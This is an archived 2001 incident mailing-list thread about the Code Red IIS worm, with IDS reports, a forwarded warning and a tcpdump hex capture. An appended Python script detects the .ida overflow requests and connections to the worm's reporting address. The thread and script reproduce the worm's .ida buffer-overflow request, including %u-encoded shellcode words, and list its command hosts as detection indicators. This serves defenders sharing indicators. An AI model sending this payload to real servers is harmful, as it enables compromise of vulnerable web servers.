Re(2): Strange web traffic

From: Ken Eichman (keichmanat_private)
Date: Tue Jul 17 2001 - 12:49:28 PDT


    Scott, Check out Richard Bejtlich's posting to this list from Sunday.
    For your convenience I'm including it here.  Looks like the new IIS
    worm.  I've been tracking it on my IDS and reporting it since Sunday
    07/15.  After I figured out what to look for I went back through my
    logs and found the first worm hit (http scan traffic) at 08:54:30 EDT
    on 07/13 from 202.192.168.145, followed within 15 minutes by
    additional scans from 210.77.157.171, 202.204.193.2 and 210.68.172.1.
    
    So far (as of about 8 hours ago) I logged the http scan from 8122
    unique - assumedly compromised - hosts since the first hit on 07/13.
    In the absence of any advisories about this activity many admins are
    incredulous when I report it to them. But I have received
    response from a number of sites (20-30) confirming the IIS compromise.
    
    Regards
    Ken
    
    Ken Eichman                  Senior Security Engineer
    Chemical Abstracts Service   Tel:   (614) 447-3838 ext 3230
    2540 Olentangy River Road    Fax:   (614) 447-3855
    Columbus, OH 43210           Email: keichmanat_private
    
    =======================================================================
    Forwarded mail follows:
    Date: Sun, 15 Jul 2001 16:25:42 -0500
    From: Richard Bejtlich <richardat_private>
    Reply-To: richardat_private
    Organization: TaoSecurity.com
    Subject: IIS .ida exploit involving worm.com / 181.com / 216.99.52.100
    
    Friends in the security world,
    
    I have recently observed multiple exploit attempts related to the
    "Microsoft Index Server and Indexing Service ISAPI Extension Buffer
    Overflow Vulnerability" described here:
    
    http://www.securityfocus.com/frames/?content=/vdb/bottom.html%3Fvid%3D2880
    
    It looks like successful execution of an exploit in the wild may result
    in the compromised machine making a connection to www.worm.com to report
    its status (216.99.52.100, also aliased as 181.com and chinga.com; note
    chinga.com also has an address of 209.81.7.23).  Below is the signature
    of the exploit.  I edited sections marked XXcensoredXX to preserve my
    privacy:
    
    GET
    /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
      HTTP/1.0
    Content-type: text/xml
    HOST:www.worm.com
      Accept: */*
    Content-length: 3569
    
    ?  HTTP/1.0
    Content-type: text/xml
    HOST:www.worm.com
      Accept: */*
    Content-length: 3569
    
    c:\notwormLMTH
    <html><head><meta http-equiv="Content-Type" content="text/html;
    charset=english"><title>HELLO!</title></head><bady><hr size=5><font
    color="red"><p align="center">Welcome to http://www.worm.com
    !<br><br>Hacked By Chinese!</font></hr></bady></html> HTTP/1.0 200
    Pragma: no-cache
    Cache-Control: no-cache
    Content-Type: text/html
    Content-Length: 90
    
    <TITLE>Error</TITLE>
    <BODY>
    <H1>Error</H1>
    XXcensoredXX: Unknown WWW server.</BODY>
    
    -----
    
    Curious about www.worm.com, I connected to port 80 on the box and found
    this:
    
    telnet www.worm.com 80
    Trying 216.99.52.100...
    Connected to chinga.com (216.99.52.100).
    Escape character is '^]'.
    
    
    <HTML>
    <HEAD>
    <META HTTP-EQUIV="REFRESH" CONTENT="0.01;
    URL=http://www.goto.com/d/home/p/nettcorp/lander/srchindex.jhtml">
    <TITLE> Nett Corp </TITLE>
    </HEAD>
    <blockquote><!-- dlogphp activated, unique hit site is 181.com.  IP is
    XXcensored, but it was my IP addressXX.  Broswer is -->
    </blockquote>
    </BODY>
    </HTML>
    Connection closed by foreign host.
    
    -----
    
    You can see in the 'dlogphp activated' section that my IP address
    appears to have been logged.  (I removed the actual IP address.)
    
    I suggest that readers check their logs for connections to 216.99.52.100
    (www.worm.com), as outbound connections MAY indicate a compromised host.
    I am not a Windows expert and cannot validate the exploit as recorded
    in my logs, but I believe you may find this warning useful.
    
    Sincerely,
    
    Richard Bejtlich
    http://bejtlich.net
    
    =======================================================
    
    ================ Your original message: ===============
    Date: Tue, 17 Jul 2001 19:37:57 +0100
    From: Scott Nursten <scott.nurstenat_private>
    MIME-Version: 1.0
    To: incidentsat_private
    Subject: Re: Strange web traffic
    
    Sorry guys, on my way home, trying to rush out the door .... but before I go, I noticed this - I overlooked it earlier as I'm in quite a hurry. Having analysed it a bit better now (and actually getting a single stream as opposed to several thousand), you see this:
    
    9:15:37.873583 217.86.214.81.4037 > 194.130.109.164.80: S [tcp sum ok] 3804761538:3804761538(0) win 8760 <mss 1460,nop,nop,sackOK> (DF) (ttl 116, id 49118, len 48)
    0x0000   4500 0030 bfde 4000 7406 671a d956 d651        E..0..@.t.g..V.Q
    0x0010   c282 6da4 0fc5 0050 e2c8 0dc2 0000 0000        ..m....P........
    0x0020   7002 2238 8078 0000 0204 05b4 0101 0402        p."8.x..........
    
    19:15:37.873625 194.130.109.164.80 > 217.86.214.81.4037: S [tcp sum ok] 79900976:79900976(0) ack 3804761539 win 5840 <mss 1460,nop,nop,sackOK> (DF) (ttl 64, id 0, len 48)
    0x0000   4500 0030 0000 4000 4006 5af9 c282 6da4        E..0..@.@.Z...m.
    0x0010   d956 d651 0050 0fc5 04c3 3130 e2c8 0dc3        .V.Q.P....10....
    0x0020   7012 16d0 55dc 0000 0204 05b4 0101 0402        p...U...........
    
    19:15:38.200238 217.86.214.81.4037 > 194.130.109.164.80: . [tcp sum ok] 1:1(0) ack 1 win 8760 (DF) (ttl 116, id 49162, len 40)
    0x0000   4500 0028 c00a 4000 7406 66f6 d956 d651        E..(..@.t.f..V.Q
    0x0010   c282 6da4 0fc5 0050 e2c8 0dc3 04c3 3131        ..m....P......11
    0x0020   5010 2238 7738 0000 6d78 0000 0003             P."8w8..mx....
    
    19:15:38.202867 217.86.214.81.4037 > 194.130.109.164.80: P [tcp sum ok] 1:5(4) ack 1 win 8760 (DF) (ttl 116, id 49163, len 44)
    0x0000   4500 002c c00b 4000 7406 66f1 d956 d651        E..,..@.t.f..V.Q
    0x0010   c282 6da4 0fc5 0050 e2c8 0dc3 04c3 3131        ..m....P......11
    0x0020   5018 2238 dbc6 0000 4745 5420 6540             P."8....GET.e@
    
    19:15:38.203063 194.130.109.164.80 > 217.86.214.81.4037: . [tcp sum ok] 1:1(0) ack 5 win 5840 (DF) (ttl 64, id 15641, len 40)
    0x0000   4500 0028 3d19 4000 4006 1de8 c282 6da4        E..(=.@.@.....m.
    0x0010   d956 d651 0050 0fc5 04c3 3131 e2c8 0dc7        .V.Q.P....11....
    0x0020   5010 16d0 829c 0000                            P.......
    
    19:15:38.404751 217.86.214.81.4037 > 194.130.109.164.80: P [tcp sum ok] 5:1465(1460) ack 1 win 8760 (DF) (ttl 116, id 49164, len 1500)
    0x0000   4500 05dc c00c 4000 7406 6140 d956 d651        E.....@.t.a@.V.Q
    0x0010   c282 6da4 0fc5 0050 e2c8 0dc7 04c3 3131        ..m....P......11
    0x0020   5018 2238 73c8 0000 2f64 6566 6175 6c74        P."8s.../default
    0x0030   2e69 6461 3f4e 4e4e 4e4e 4e4e 4e4e 4e4e        .ida?NNNNNNNNNNN
    0x0040   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x0050   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x0060   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x0070   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x0080   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x0090   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x00a0   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x00b0   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x00c0   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x00d0   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x00e0   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x00f0   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x0100   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x0110   4e4e 4e4e 4e25 7539 3039 3025 7536 3835        NNNNN%u9090%u685
    0x0120   3825 7563 6264 3325 7537 3830 3125 7539        8%ucbd3%u7801%u9
    0x0130   3039 3025 7536 3835 3825 7563 6264 3325        090%u6858%ucbd3%
    0x0140   7537 3830 3125 7539 3039 3025 7536 3835        u7801%u9090%u685
    0x0150   3825 7563 6264 3325 7537 3830 3125 7539        8%ucbd3%u7801%u9
    0x0160   3039 3025 7539 3039 3025 7538 3139 3025        090%u9090%u8190%
    0x0170   7530 3063 3325 7530 3030 3325 7538 6230        u00c3%u0003%u8b0
    0x0180   3025 7535 3331 6225 7535 3366 6625 7530        0%u531b%u53ff%u0
    0x0190   3037 3825 7530 3030 3025 7530 303d 6120        078%u0000%u00=a.
    0x01a0   2048 5454 502f 312e 300d 0a43 6f6e 7465        .HTTP/1.0..Conte
    0x01b0   6e74 2d74 7970 653a 2074 6578 742f 786d        nt-type:.text/xm
    0x01c0   6c0a 484f 5354 3a77 7777 2e77 6f72 6d2e        l.HOST:www.worm.
    0x01d0   636f 6d0a 2041 6363 6570 743a 202a 2f2a        com..Accept:.*/*
    0x01e0   0a43 6f6e 7465 6e74 2d6c 656e 6774 683a        .Content-length:
    0x01f0   2033 3536 3920 0d0a 0d0a 558b ec81 ec18        .3569.....U.....
    
    19:15:38.404825 194.130.109.164.80 > 217.86.214.81.4037: . [tcp sum ok] 1:1(0) ack 1465 win 8760 (DF) (ttl 64, id 15642, len 40)
    0x0000   4500 0028 3d1a 4000 4006 1de7 c282 6da4        E..(=.@.@.....m.
    0x0010   d956 d651 0050 0fc5 04c3 3131 e2c8 137b        .V.Q.P....11...{
    0x0020   5010 2238 7180 0000                            P."8q...
    
    19:15:38.405121 194.130.109.164.80 > 217.86.214.81.4037: P [tcp sum ok] 1:500(499) ack 1465 win 8760 (DF) (ttl 64, id 15643, len 539)
    0x0000   4500 021b 3d1b 4000 4006 1bf3 c282 6da4        E...=.@.@.....m.
    0x0010   d956 d651 0050 0fc5 04c3 3131 e2c8 137b        .V.Q.P....11...{
    0x0020   5018 2238 4829 0000 4854 5450 2f31 2e31        P."8H)..HTTP/1.1
    0x0030   2034 3030 2042 6164 2052 6571 7565 7374        .400.Bad.Request
    0x0040   0d0a 4461 7465 3a20 5475 652c 2031 3720        ..Date:.Tue,.17.
    0x0050   4a75 6c20 3230 3031 2031 383a 3135 3a33        Jul.2001.18:15:3
    0x0060   3820 474d 540d 0a53 6572 7665 723a 2041        8.GMT..Server:.A
    0x0070   7061 6368 652f 312e 332e 3230 2028 556e        pache/1.3.20.(Un
    0x0080   6978 2920 5048 502f 342e 302e 360d 0a43        ix).PHP/4.0.6..C
    0x0090   6f6e 6e65 6374 696f 6e3a 2063 6c6f 7365        onnection:.close
    0x00a0   0d0a 436f 6e74 656e 742d 5479 7065 3a20        ..Content-Type:.
    0x00b0   7465 7874 2f68 746d 6c3b 2063 6861 7273        text/html;.chars
    0x00c0   6574 3d69 736f 2d38 3835 392d 310d 0a0d        et=iso-8859-1...
    0x00d0   0a3c 2144 4f43 5459 5045 2048 544d 4c20        .<!DOCTYPE.HTML.
    0x00e0   5055 424c 4943 2022 2d2f 2f49 4554 462f        PUBLIC."-//IETF/
    0x00f0   2f44 5444 2048 544d 4c20 322e 302f 2f45        /DTD.HTML.2.0//E
    0x0100   4e22 3e0a 3c48 544d 4c3e 3c48 4541 443e        N">.<HTML><HEAD>
    0x0110   0a3c 5449 544c 453e 3430 3020 4261 6420        .<TITLE>400.Bad.
    0x0120   5265 7175 6573 743c 2f54 4954 4c45 3e0a        Request</TITLE>.
    0x0130   3c2f 4845 4144 3e3c 424f 4459 3e0a 3c48        </HEAD><BODY>.<H
    0x0140   313e 4261 6420 5265 7175 6573 743c 2f48        1>Bad.Request</H
    0x0150   313e 0a59 6f75 7220 6272 6f77 7365 7220        1>.Your.browser.
    0x0160   7365 6e74 2061 2072 6571 7565 7374 2074        sent.a.request.t
    0x0170   6861 7420 7468 6973 2073 6572 7665 7220        hat.this.server.
    0x0180   636f 756c 6420 6e6f 7420 756e 6465 7273        could.not.unders
    0x0190   7461 6e64 2e3c 503e 0a43 6c69 656e 7420        tand.<P>.Client.
    0x01a0   7365 6e74 206d 616c 666f 726d 6564 2048        sent.malformed.H
    0x01b0   6f73 7420 6865 6164 6572 3c50 3e0a 3c48        ost.header<P>.<H
    0x01c0   523e 0a3c 4144 4452 4553 533e 4170 6163        R>.<ADDRESS>Apac
    0x01d0   6865 2f31 2e33 2e32 3020 5365 7276 6572        he/1.3.20.Server
    0x01e0   2061 7420 7469 7461 6e69 612e 696e 6672        .at.titania.infr
    0x01f0   6f6e 742e 636f 2e75 6b20 506f 7274 2038        ont.co.uk.Port.8
    0x0200   303c 2f41 4444 5245 5353 3e0a 3c2f 424f        0</ADDRESS>.</BO
    0x0210   4459 3e3c 2f48 544d 4c3e 0a                    DY></HTML>.
    
    19:15:38.405193 194.130.109.164.80 > 217.86.214.81.4037: F [tcp sum ok] 500:500(0) ack 1465 win 8760 (DF) (ttl 64, id 15644, len 40)
    0x0000   4500 0028 3d1c 4000 4006 1de5 c282 6da4        E..(=.@.@.....m.
    0x0010   d956 d651 0050 0fc5 04c3 3324 e2c8 137b        .V.Q.P....3$...{
    0x0020   5011 2238 6f8c 0000                            P."8o...
    
    19:15:38.950063 217.86.214.81.4037 > 194.130.109.164.80: . [tcp sum ok] 1465:2925(1460) ack 1 win 8760 (DF) (ttl 116, id 49212, len 1500)
    
    19:15:38.986071 194.130.109.164.80 > 217.86.214.81.4037: . [tcp sum ok] 501:501(0) ack 2925 win 11680 (DF) (ttl 64, id 15645, len 40)
    0x0000   4500 0028 3d1d 4000 4006 1de4 c282 6da4        E..(=.@.@.....m.
    0x0010   d956 d651 0050 0fc5 04c3 3325 e2c8 192f        .V.Q.P....3%.../
    0x0020   5010 2da0 5e70 0000                            P.-.^p..
    
    Then the packet below. I caught the one below first for obvious reasons: "Hacked By Chinese". :) That's pretty much the whole stream (bar the bye-byes).
    
    HTH some more.
    
    Rgds,
    
    Scott
    
    
    Scott Nursten - Systems Administrator
    ----------------------------------------------
    ddi:   +44 (0) 1293 744 122
    work:  +44 (0) 1293 402 040
    fax:   +44 (0) 1293 402 050
    email: scottnat_private
    wwweb: http://www.streetsonline.co.uk
    ----------------------------------------------
    
    			"Without order nothing can exist - without chaos nothing can evolve."
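Added example, not code from Ken's, Richard's or Scott's mail: a log check for the two indicators the forwarded messages describe, the .ida overflow request (default.ida, a long run of one filler byte, then %u-encoded words, HOST:www.worm.com) and outbound connections to 216.99.52.100. The W3C field layout, the firewall line format and every log line in the sample are constructed; only the signature fragments and addresses come from the thread.

```python
"""Log checks for the Code Red indicators described in the thread (added
example; the log lines, W3C field layout and firewall line format are
constructed, the signature fragments and addresses come from the thread)."""
import re
from typing import Dict, Iterable, List, Tuple

# Addresses the forwarded mail associates with www.worm.com / 181.com / chinga.com.
WORM_REPORT_IPS = {"216.99.52.100", "209.81.7.23"}

# An Index Server extension (.ida/.idq) request whose query string is a long
# run of one filler byte followed by at least three %u-encoded 16-bit words:
# the shape seen as NNNN...%u9090%u6858%ucbd3... in the captures above.
IDA_RE = re.compile(
    r"/[^\s?]*\.id[aq]\?(?P<fill>([A-Za-z])\2{99,})(?P<enc>(?:%u[0-9a-fA-F]{4}){3,})",
    re.IGNORECASE,
)
# Constructed firewall line format: "... src=A.B.C.D dst=E.F.G.H dport=N".
CONN_RE = re.compile(r"src=(\d{1,3}(?:\.\d{1,3}){3}) dst=(\d{1,3}(?:\.\d{1,3}){3}) dport=(\d+)")


def classify_request(request: str) -> Dict[str, object]:
    """Verdict for one request line, optionally followed by its headers."""
    verdict: Dict[str, object] = {"ida_overflow": False, "fill_length": 0, "worm_host_header": False}
    m = IDA_RE.search(request)
    if m:
        verdict["ida_overflow"] = True
        verdict["fill_length"] = len(m.group("fill"))
    # The worm's own request carries "HOST:www.worm.com" (no space after the colon).
    if re.search(r"^HOST\s*:\s*www\.worm\.com", request, re.IGNORECASE | re.MULTILINE):
        verdict["worm_host_header"] = True
    return verdict


def parse_w3c(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Parse W3C extended log lines into dicts keyed by the names in #Fields."""
    fields: List[str] = []
    rows: List[Dict[str, str]] = []
    for line in lines:
        line = line.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split())))
    return rows


def scan_iis_log(lines: Iterable[str]) -> List[Dict[str, object]]:
    """One record per logged request that matches the .ida overflow shape."""
    hits: List[Dict[str, object]] = []
    for row in parse_w3c(lines):
        query = row.get("cs-uri-query", "-")
        uri = row.get("cs-uri-stem", "") + ("" if query == "-" else "?" + query)
        verdict = classify_request(uri)
        if verdict["ida_overflow"]:
            hits.append({"client": row.get("c-ip"),
                         "when": f"{row.get('date')} {row.get('time')}",
                         "fill_length": verdict["fill_length"],
                         "status": row.get("sc-status")})
    return hits


def scan_connections(lines: Iterable[str]) -> List[Tuple[str, str, int]]:
    """Flag outbound connections whose destination is a worm reporting address."""
    hits: List[Tuple[str, str, int]] = []
    for line in lines:
        m = CONN_RE.search(line)
        if m and m.group(2) in WORM_REPORT_IPS:
            hits.append((m.group(1), m.group(2), int(m.group(3))))
    return hits


# Constructed sample data.  The .ida line reuses the first scanning address and
# the %u words quoted in the thread; 224 filler bytes is the count in this sample.
CODE_RED_QUERY = "N" * 224 + ("%u9090%u6858%ucbd3%u7801" * 3
                              + "%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a")
SAMPLE_IIS_LOG = [
    "#Software: Microsoft Internet Information Services 5.0",
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2001-07-13 12:54:30 202.192.168.145 GET /default.ida " + CODE_RED_QUERY + " 200",
    "2001-07-13 12:55:02 198.51.100.7 GET /index.htm - 200",
    "2001-07-13 12:55:40 198.51.100.9 GET /query.ida CiRestriction=quarterly%20report 200",
]
SAMPLE_FW_LOG = [
    "Jul 15 16:25:42 fw kernel: OUT src=10.1.2.3 dst=216.99.52.100 dport=80",
    "Jul 15 16:25:43 fw kernel: OUT src=10.1.2.3 dst=198.51.100.7 dport=80",
]
```

`scan_iis_log(SAMPLE_IIS_LOG)` reports only the default.ida request (the benign query.ida lookup has no filler run), and `scan_connections(SAMPLE_FW_LOG)` returns only the connection to 216.99.52.100.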
    
    
    
    
    



    This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 14:00:42 PDT